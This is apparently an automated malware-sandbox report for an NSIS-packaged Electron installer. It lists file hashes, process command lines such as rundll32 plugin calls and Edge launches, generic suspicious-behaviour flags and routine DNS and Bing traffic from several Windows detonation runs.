| SHA512 | 25f9c2b75febfe607cbdd872a82338aecb5f277ed2d3d80fe0ec01289e3361445102392ea23207658ac347a774a7f47bbe19672d49f080cd6aea220da5ac3618 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\ru.pak
| MD5 | 4fb18b712580caa5cdff8c8cbe9e67f3 |
| SHA1 | 79bdeed0aa9bef9a8396a426e370b4022b09243d |
| SHA256 | bee87b5ef0ab61c05eb3ed4c43ba0900a75a853fdaef2218ffa1b2eaa4d29d21 |
| SHA512 | fd91fae4dfded1fcb6cc0e6a6da4caa123c8347d1a9eff33c0d5339aa9854dc07bbb3c84e1880f260eaf932a1a2af9784157d5656b29d661e20961f499b1e5b0 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sl.pak
| MD5 | be05e8eea54a25cd15d807264f8aa284 |
| SHA1 | a63dc26044b31fb4e1a35b1f5778150d737ccfce |
| SHA256 | 63963e60a45495ff762f02e02fd42c723d7c482a44c07e50473cbf7ccdd73eca |
| SHA512 | 4163b3eeb5e55beacc53349cad6899e871d74109a50b28a001e98f0000cf6eb57d4e06f10a70557664f15f4456fbcbb80ac7dbd1174bd19a20975da108ef2dc5 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sk.pak
| MD5 | 8e5ecfbf0ab9e00401f088489afed0c2 |
| SHA1 | a99df2ed2a00ade4cde178f73893b84aaee521cc |
| SHA256 | 25e0167d708a004e36e3c344e0209e979d42874122cae03ef2e2c5e110f39364 |
| SHA512 | 401ea003abfb4a32b52cfab912c2199800f54aabf1321802f973a9925f535d40cff9825832d98ca86eb3af794f64aa408dbbd99e2083f2e9fd0d02ec4debd301 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sv.pak
| MD5 | 8132fd35c20f775508f5440b7f3d6871 |
| SHA1 | 4e50c2b45c69e95f95f34398a7a4babc06420c1a |
| SHA256 | 867687296810c4a95a1876edd91ce08e57ff1894c9f22913808fee1d21362589 |
| SHA512 | e13ca94f6766a49a9b11a128bad1a5803c3ae9aaa9a8a536995eaf510da071995fa27b087fd3f14422cf21792a54b9527a1fe658947a446a6764b32a86479d3f |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sr.pak
| MD5 | b1f52cd111da3b1ea1f31e082f15ba25 |
| SHA1 | 3f4f13a0d253e8fbcfc1fb93125feed51f03bc56 |
| SHA256 | 1410f7d93d53642ef9aa8dfd92497c923d71a97e419a6219c7bee7798c3561e1 |
| SHA512 | 2c0ae8d36c496d570d6e013f859caf655a74047a2a27b79ad0895eba5a46c0895d123d532b8bfa4370ce67caf6b874cb29d751fd025586bfafad0bb800b22144 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\ta.pak
| MD5 | 088f7313392bd5bd898a984b434cee97 |
| SHA1 | bda9d5f5e87055674aecdb609a46a046bb0a6903 |
| SHA256 | e2868cbfde36485e8227ec24789a809ef4590f8841e5ee625cee154ba3701e78 |
| SHA512 | f8849d13924da2f5e3bb98f2aae19317d3f4260ec8e916ab88a91d6af97c9ba8fab929f91acb3b5575e30e87dda847f1192b6b2dc1d05341ce75a86a4fee8edb |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\te.pak
| MD5 | d251d089aa789bccc27a0b473d39e46c |
| SHA1 | 283d8fb6b6195b3427144773ffc4691c82e31f0e |
| SHA256 | 8dd7d206379445bd9afa4e01ab986c439cf70841d080fca6e152b453e94fcc49 |
| SHA512 | 27e6f13f6c7937c8121451d70ee90d2a2ce5e519d17e882a86b29a6a78764427022c36b6a99178e9933e01500b55bcbfd0dc79a6f028a046967c2c53f78424fa |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\sw.pak
| MD5 | 0787972a076c6690e7938758c2a92e24 |
| SHA1 | dbf02e5a3ae26acb060b533bb006756c19122bfe |
| SHA256 | eb96ab83e2e08e811928742590178e97454863bc581dd8574d6a644fd3c6615a |
| SHA512 | 9f3560a3b648b1a7025cd8a98c39ec7634883aade1ac2c7836fde890cc04bd009aa5c1bca8354ee1259ebcd9482326c51a7d21bdee3caf92984ecbefab35d34c |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\tr.pak
| MD5 | 1e661df0ee32346b7816e1cec439e9da |
| SHA1 | 2bd38e0a4ec62f306aae932d8e448a0911a5a63c |
| SHA256 | 6c5dfdfe34c0f6b2b00364dbd7ef3c62fb0d71a163f9254a7b4b3624d66c4ec0 |
| SHA512 | ef49c1f329f00e2a9350e7a6e3789c6ea2c84026e541717e4d72ea3723ac29e9be3e0d4a82e36ccfab27365feceef0012c209c53e3b079148140e0f08f55de56 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\ur.pak
| MD5 | 7b5fed5150135b728bf8865246f7c8fc |
| SHA1 | 214b0f507ff6384b1b305f1718db43023499eeaa |
| SHA256 | a0c752a805da7dd6608ad04625734f4d27cb75b682f51b2dc8ef08350cc7a2cc |
| SHA512 | 81fc55db4b0635e09057fd060d9eb72bda5a5fd2d2e1e4284e1b45098b287c609526c766b030dd0eaebc0836a32bcbf6dc0aae94327c103f3f736b5cd051a8a1 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\zh-CN.pak
| MD5 | 8af3f2940137687b483ff2f4d9185b98 |
| SHA1 | 58ce1fcadd8ca27abd11f0614401a12a7e93b11e |
| SHA256 | 766f8ac9d4e06437fd3300608ad4d31228576dcaa1e164ccbc4333d56493e9fe |
| SHA512 | fe55fb3d0abab843e4ea1a33d590b3a9e885f6ea8a38cb8f651d090e8c5ea3400efd212502cac500ef26cc5d6b7a4a7cb66e4aee1a4bb13b97f0926ac99b16e0 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\vi.pak
| MD5 | b6174a2dd1e3f557cb99060fc3101063 |
| SHA1 | be115f1d2dc8135683a182ab5c09feab74a3c97f |
| SHA256 | b654478c2d28b97d821a75543a0494bc35548749fc3eeb6b33b08b4f5f4fd84c |
| SHA512 | ddbd38e7513f213b3603b1fbf16ad21fa34382cd11e33201cf579c2913a7b6e143a03bf12f11afb281a40c6948da9844b6c9d5ab372d7500184014e98ea74c19 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\zh-TW.pak
| MD5 | ca8bf0d267507545580758c81e9fb2c2 |
| SHA1 | 9ec7a2e731775bf3224317681847ffc54376702d |
| SHA256 | eb02d499aada4f358c0776c301416de758167ada695503c0e72135ee462fcdfc |
| SHA512 | d5322739253544d519d52aaf8a34fd0fcf3abcc49499e60d320265e85b173f49189d0f95c7ff67a9369400759830141bc342de7fb710cd047e8832070007716f |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\uk.pak
| MD5 | b11fcf5670f611e270552a51e8f4000a |
| SHA1 | c28630a621b77df7434fb016f5b1e50d456cf296 |
| SHA256 | 96f45509b52f046e70f3f61416b93ba8f2f5a0f06d7d849056161300a3ac6e5c |
| SHA512 | a6f357825e59c35f72d740ca23300b3e233be1949dc4c5c5a3a268f4e0194b0be839f95fc125d8527d851971952c09ac233b294002f43911c2599859d935e8c7 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\resources\app.asar
| MD5 | e17391bf3cc98be5554b509c39908fb9 |
| SHA1 | 8f2e6726c940ce42df95a05c78385c824b4d560a |
| SHA256 | 7fbeab871461f743124788a03f048c21991e6f8cd165cf7af5ed87bf11126e3a |
| SHA512 | 998750ec0971f5aa7102253b38eb786dc3ba1f5ef9870a34ba7e4366cef37c04c15dca75467b17cfdb0b8c6950f042615ada8f6689d8cf8453460456133e67aa |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\7z-out\locales\th.pak
| MD5 | 33dae3c79e7c1798eada31b70e3f2518 |
| SHA1 | c386f4babd6545c915dda9dfd4bcc8cae5ff6c86 |
| SHA256 | a88de31d7605a1c3eed2b5008cbf31de368d91fd57a543c995a3c2263144054a |
| SHA512 | a1d033f85ba340a8f6f3da1aaa15bb8b04abc1acca1e9554af04576f512d38e6088c406f3227e03239e741eab68fe3a83a0ee13aff3c51554fa7e41b1d42029d |
C:\Users\Admin\AppData\Local\Temp\nso1621.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
136s
Max time network
107s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2664 wrote to memory of 4884 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2664 wrote to memory of 4884 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2664 wrote to memory of 4884 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 4884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7fffba6b46f8,0x7fffba6b4708,0x7fffba6b4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16416942334367780504,18176149070364633297,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3044 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 439b5e04ca18c7fb02cf406e6eb24167 |
| SHA1 | e0c5bb6216903934726e3570b7d63295b9d28987 |
| SHA256 | 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654 |
| SHA512 | d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2 |
\??\pipe\LOCAL\crashpad_816_YTNXWRNVAHFSEDRA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a8e767fd33edd97d306efb6905f93252 |
| SHA1 | a6f80ace2b57599f64b0ae3c7381f34e9456f9d3 |
| SHA256 | c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb |
| SHA512 | 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 24f5eae92162bed7b593cd7af688cee2 |
| SHA1 | 8506b0c1644d51bc69bf3beca3a9e7d81ffc0b6c |
| SHA256 | dd166b4db1ab1554ebc560009d823e0eab8992237d00f2d049395484603c94d9 |
| SHA512 | 2bbb9b7cf873c85946b2914705909fc31f35eb6e86ee47d5b367d54af16288f9c568a8fb2d92b7c3ba1adff27d4698bea41241bedeba569de8e6b45848026ba1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2d9319626454f899e7de2610055df7e2 |
| SHA1 | 5bc6f66471d538be58394b05bca38f275b9d614b |
| SHA256 | 58bb01a0681a7897bef3591f45fa230c7605c91e3c0ac31a9b075d3540951b1a |
| SHA512 | eafedfbcd9011d809611af46ae261a7e190ec0f6259b67b9135602359014a5d1cfcd3e572b065fb3918c9ee492cfb6367358bf0f54103c874e88effad3fd98d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | df6102fcece050c6c17f935b2e2e9778 |
| SHA1 | 612726ea14088002a2cb10a1c278bc8040998628 |
| SHA256 | acde55455211444a448252b2c36fc3f56bfec1f0ad8e193a51aa5a92cbf97164 |
| SHA512 | a4f0032098b3c7822ef6e133290a10c96e640ebb6afabd6dcc1ed8e3a3344b25aa8dd52c67aedc8d635a04a0e6e056bf05cd8856b9c520dddc64c3908a507da1 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240426-en
Max time kernel
93s
Max time network
154s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 116 wrote to memory of 4540 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 116 wrote to memory of 4540 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 116 wrote to memory of 4540 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4540 -ip 4540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20240220-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 220
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win7-20240419-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
